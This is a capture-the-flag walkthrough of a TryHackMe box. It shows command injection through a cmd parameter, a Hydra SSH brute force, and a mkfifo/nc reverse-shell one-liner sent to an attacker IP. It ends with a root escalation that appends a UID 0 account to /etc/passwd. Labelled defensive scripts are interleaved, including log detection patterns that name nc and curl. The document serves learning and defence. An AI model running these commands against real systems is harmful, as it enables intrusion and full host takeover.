Challenges: U.A High School (TryHackMe)

This challenge tasked us with testing the security of a web application developed by U.A., the renowned Superhero Academy. The objective was to identify vulnerabilities, gain initial foothold access, escalate privileges, and ultimately retrieve the required flags. To achieve this, we began with network and directory enumeration using tools such as nmap and gobuster. This initial phase revealed accessible web endpoints that allowed command execution via the cmd parameter. Using this entry point, we gained shell access as the www-data user, discovered hidden files, decoded embedded credentials, and leveraged them to pivot into a user account with SSH access.
Join us in the mission to protect the digital world of superheroes! U.A., the most renowned Superhero Academy, is looking for a superhero to test the security of our new site.
Our site is a reflection of our school values, designed by our engineers with incredible Quirks. We have gone to great lengths to create a secure platform that reflects the exceptional education of the U.A.
Please allow the machine 3 - 5 minutes to fully boot.
Answer the questions below
What is the user.txt flag?
The challenge focused on identifying vulnerabilities in a superhero-themed web application. We began with reconnaissance using nmap to scan for open ports and gobuster to enumerate directories and files. This revealed an index.php page under /assets with a cmd parameter that is vulnerable to command injection.
nmap -sV IP_Address
gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://IP_Address/assets -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
Testing this parameter allowed us to execute commands on the host, including reading /etc/passwd, which revealed a user named deku. We attempted to brute force deku’s SSH credentials using Hydra, but it was unsuccessful. Instead, we exploited the command injection to establish a reverse shell back to our machine using nc and curl.
http://IP_Address/assets/index.php?cmd=ls


http://IP_Address/assets/index.php?cmd=cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
deku:x:1000:1000:deku:/home/deku:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
ubuntu:x:1001:1002:Ubuntu:/home/ubuntu:/bin/bash
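From the defender's side, every one of the requests above leaves a trace in the web server's access log. The following is an added example, not part of the write-up, that scans access-log lines for requests passing shell commands through a query parameter (the cmd parameter shown above) and grades them by whether the value contains shell metacharacters or chained commands. It assumes the Apache/nginx "combined" log format; the sample log lines are constructed for this example and the parameter list is an assumption beyond cmd.

```python
"""Added example (not from the write-up): scan web-server access-log lines for requests that
pass shell commands through a query parameter, the pattern abused via /assets/index.php?cmd=.

Assumptions: Apache/nginx "combined" log format; the parameter name cmd comes from the
write-up, the sample log lines below are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names to inspect; cmd is the one shown in the write-up.
SUSPECT_PARAMS = {"cmd"}

# Shell metacharacters, command chaining, and a few binaries/paths typical of injection payloads.
PAYLOAD_MARKERS = re.compile(
    r"[;|&`$<>]|/etc/passwd|\b(mkfifo|nc|bash|sh|curl|wget|cat)\b"
)

# Minimal combined-log parser: client IP, timestamp, method, request path, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
)


def analyze_line(line):
    """Return a list of findings for one log line (empty if nothing suspicious)."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("path"))
    # parse_qs percent-decodes the values, so 'cat%20/etc/passwd' becomes 'cat /etc/passwd'.
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    for name, values in params.items():
        if name not in SUSPECT_PARAMS:
            continue
        for value in values:
            # Any use of the parameter is worth logging; shell markers raise the severity.
            severity = "high" if PAYLOAD_MARKERS.search(value) else "medium"
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": url.path,
                "param": name,
                "value": value,
                "severity": severity,
            })
    return findings


def scan_log(text):
    """Analyze every line of an access log and return all findings in order."""
    results = []
    for line in text.splitlines():
        results.extend(analyze_line(line))
    return results


# Constructed sample log: three probes of the cmd parameter and one ordinary asset request.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /assets/index.php?cmd=ls HTTP/1.1" 200 512 "-" "curl/7.81.0"
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /assets/index.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 2048 "-" "curl/7.81.0"
10.0.0.5 - - [10/Oct/2023:13:56:02 +0000] "GET /assets/index.php?cmd=id%3Bwhoami HTTP/1.1" 200 64 "-" "curl/7.81.0"
10.0.0.9 - - [10/Oct/2023:13:57:00 +0000] "GET /assets/style.css HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']} {f['path']} {f['param']}={f['value']!r}")
```

The medium grade for a bare `ls` is deliberate: on an endpoint that should never accept commands at all, any value in cmd is worth an alert, and the metacharacter check only decides how loudly. Note that POST bodies are not in the access log, so the same check would have to run at the application or WAF layer to cover them.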


The /etc/passwd output revealed a user called deku. We tried Hydra against SSH to find this user's password, but it didn't work:
hydra -l deku -P /usr/share/wordlists/rockyou.txt ssh://IP_Address
Run these two commands in separate tabs:
nc -lvnp 443
curl -s 'http://IP_Address/assets/index.php' -G --data-urlencode 'cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.250.155 443 >/tmp/f'

Once inside as the www-data user, we discovered a hidden folder named Hidden_Content, which contained a passphrase.txt file encoded in Base64 and an image (oneforall.jpg) with a corrupted header. After repairing the header using hexedit, we extracted hidden data using steghide, which revealed credentials for the deku account. Using these credentials, we successfully logged in via SSH and located the user.txt flag.
After running the curl command, check the tab running nc -lvnp 443: we now have a shell as www-data.
We found a Hidden_Content folder containing a passphrase.txt file. We checked its content and decoded the Base64-encoded string.


There was a JPG image whose header we had to fix:
cp oneforall.jpg fixed.jpg
hexedit fixed.jpg
FF D8 FF E0 00 10 4A 46 49 46

steghide extract -sf fixed.jpg
The passphrase: AllmightForEver!!!
cat creds.txt
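The hexedit step above restores the ten bytes every JFIF image begins with. As an added example (not from the write-up), the script below checks whether a file carries that header, distinguishes an Exif-first JPEG (which must not be overwritten with a JFIF prefix), and writes a repaired copy while leaving the original untouched. The header bytes are the ones the write-up lists; the sample image bytes are constructed and are not a real picture.

```python
"""Added example (not from the write-up): check whether a file starts with the JFIF header the
write-up restored with hexedit (FF D8 FF E0 00 10 4A 46 49 46) and, if not, write a repaired copy.

The sample bytes below are constructed (a wiped header followed by dummy data), not a real image.
"""

# SOI marker (FF D8), APP0 marker (FF E0), segment length 16 (00 10), identifier "JFIF".
JFIF_HEADER = bytes.fromhex("FFD8FFE000104A464946")
EXIF_PREFIX = bytes.fromhex("FFD8FFE1")  # JPEGs that start with an APP1/Exif segment instead


def header_status(data):
    """'ok' for a JFIF header, 'exif' for an Exif-first JPEG, 'too_short', or 'damaged'."""
    if len(data) < len(JFIF_HEADER):
        return "too_short"
    if data.startswith(JFIF_HEADER):
        return "ok"
    if data.startswith(EXIF_PREFIX):
        return "exif"
    return "damaged"


def repair_header(data):
    """Return a copy with the first 10 bytes replaced by the JFIF header, rest untouched.

    Only appropriate when the original file was JFIF; an Exif-first file is returned unchanged
    because overwriting its APP1 segment would corrupt it further.
    """
    status = header_status(data)
    if status == "too_short":
        raise ValueError("file too short to hold a JFIF header")
    if status in ("ok", "exif"):
        return bytes(data)
    return JFIF_HEADER + bytes(data[len(JFIF_HEADER):])


def repair_file(src, dst):
    """Read src, write the repaired bytes to dst (src stays intact) and return the new status."""
    with open(src, "rb") as fh:
        data = fh.read()
    fixed = repair_header(data)
    with open(dst, "wb") as fh:
        fh.write(fixed)
    return header_status(fixed)


# Constructed sample: ten zero bytes where the header should be, then the rest of the APP0
# segment (NUL terminator, version 1.1, no density units, 1x1 density, no thumbnail) and EOI.
SAMPLE_BROKEN = bytes(10) + bytes.fromhex("00010100000100010000") + bytes.fromhex("FFD9")

if __name__ == "__main__":
    print("before:", header_status(SAMPLE_BROKEN))
    print("after: ", header_status(repair_header(SAMPLE_BROKEN)))
```

Usage mirrors the write-up's cp/hexedit pair: repair_file("oneforall.jpg", "fixed.jpg") produces the copy that steghide is then run against. Only the first ten bytes are touched, so if the damage extends further into the file the status will read "ok" but the image may still fail to decode.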

The credentials of deku are now revealed, so we log in as that user through SSH:
ssh deku@IP_Address
find / -type f -name user.txt 2>/dev/null

What is the root.txt flag?
For privilege escalation, we examined sudo -l output and identified a script (/opt/NewComponent/feedback.sh) that could be run with elevated privileges. Although direct modification of /etc/passwd was restricted, the script allowed us to append a custom root-level user. By adding our own user entry with UID 0, we escalated to root privileges, located the root.txt flag, and completed the challenge.
sudo -l
pwd
cat /opt/NewComponent/feedback.sh
sudo /opt/NewComponent/feedback.sh
cat /tmp/test.txt
ls -la /tmp/test.txt
mkpasswd -m md5crypt -s
// need admin permission
nano /etc/passwd
tried to add: jxf:$1$kuPU0rVy$4lAgUF14dQf/afCWdyITu0:0:0:jxf:/root:/bin/bash to /etc/passwd but we only had read-only access
sudo /opt/NewComponent/feedback.sh
entered this line as the script's feedback input, which it appends to /etc/passwd: jxf:$1$kuPU0rVy$4lAgUF14dQf/afCWdyITu0:0:0:jxf:/root:/bin/bash
tail -n1 /etc/passwd

nano /etc/passwd
confirming that jxf:$1$kuPU0rVy$4lAgUF14dQf/afCWdyITu0:0:0:jxf:/root:/bin/bash has been added to /etc/passwd

su - jxf
find / -type f -name root.txt 2>/dev/null
cat /root/root.txt
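The appended jxf line is exactly what a host-integrity check should catch: a second UID 0 account, with its password hash sitting in the world-readable passwd file instead of /etc/shadow. The following is an added example (not from the write-up) that parses passwd text and reports extra UID 0 entries, hashes or empty passwords in the second field, duplicate names and malformed lines, plus a helper that checks whether the file is writable by group or other. The sample file content is constructed for this example and reuses the jxf entry from the write-up.

```python
"""Added example (not from the write-up): audit the text of /etc/passwd for the kind of
tampering shown above, an extra UID 0 account with its hash stored directly in the file.

The sample content below is constructed for this example; the jxf line is the one the
write-up appended.
"""
import os
import stat


def parse_passwd(text):
    """Split passwd text into dicts; entries with the wrong field count are marked malformed."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "malformed": True, "raw": raw})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({
            "line": lineno, "malformed": False, "name": name, "pw": pw,
            "uid": int(uid) if uid.isdigit() else None,
            "gid": int(gid) if gid.isdigit() else None,
            "home": home, "shell": shell,
        })
    return entries


def audit_passwd(text):
    """Return (kind, line_number, account) tuples for each suspicious entry."""
    findings = []
    seen = set()
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append(("malformed_entry", e["line"], e["raw"]))
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(("extra_uid0", e["line"], e["name"]))
        if e["pw"] == "":
            findings.append(("empty_password", e["line"], e["name"]))
        elif e["pw"] != "x" and not e["pw"].startswith(("*", "!")):
            # On a shadow-enabled system the second field should be 'x'; '*' and '!' are lock
            # markers. Anything else is a hash living in the world-readable passwd file.
            findings.append(("hash_in_passwd", e["line"], e["name"]))
        if e["name"] in seen:
            findings.append(("duplicate_name", e["line"], e["name"]))
        seen.add(e["name"])
    return findings


def writable_by_others(path):
    """True if the file's mode grants write permission to group or other."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


# Constructed sample: a normal file plus the UID 0 entry appended in the write-up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
deku:x:1000:1000:deku:/home/deku:/bin/bash
jxf:$1$kuPU0rVy$4lAgUF14dQf/afCWdyITu0:0:0:jxf:/root:/bin/bash
"""

if __name__ == "__main__":
    for kind, line, who in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line}: {kind} ({who})")
    if os.path.exists("/etc/passwd"):
        print("passwd writable by group/other:", writable_by_others("/etc/passwd"))
```

Run against a live host, the file permission check is the easy half; the harder lesson from this box is that a sudo-enabled script which writes user input into /etc/passwd is equivalent to granting write access to the file, so the same audit should be applied to whatever such scripts append, not only to the file's mode bits.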

By chaining together web exploitation, reverse shell access, credential discovery, and privilege escalation through a vulnerable script, we successfully retrieved both the user.txt and root.txt flags. This exercise demonstrated how multiple small vulnerabilities—such as arbitrary command execution, insecure file permissions, and weak credential management—can be exploited in sequence to compromise a system fully. It reinforced the importance of secure coding, proper file access controls, and credential handling in protecting real-world systems.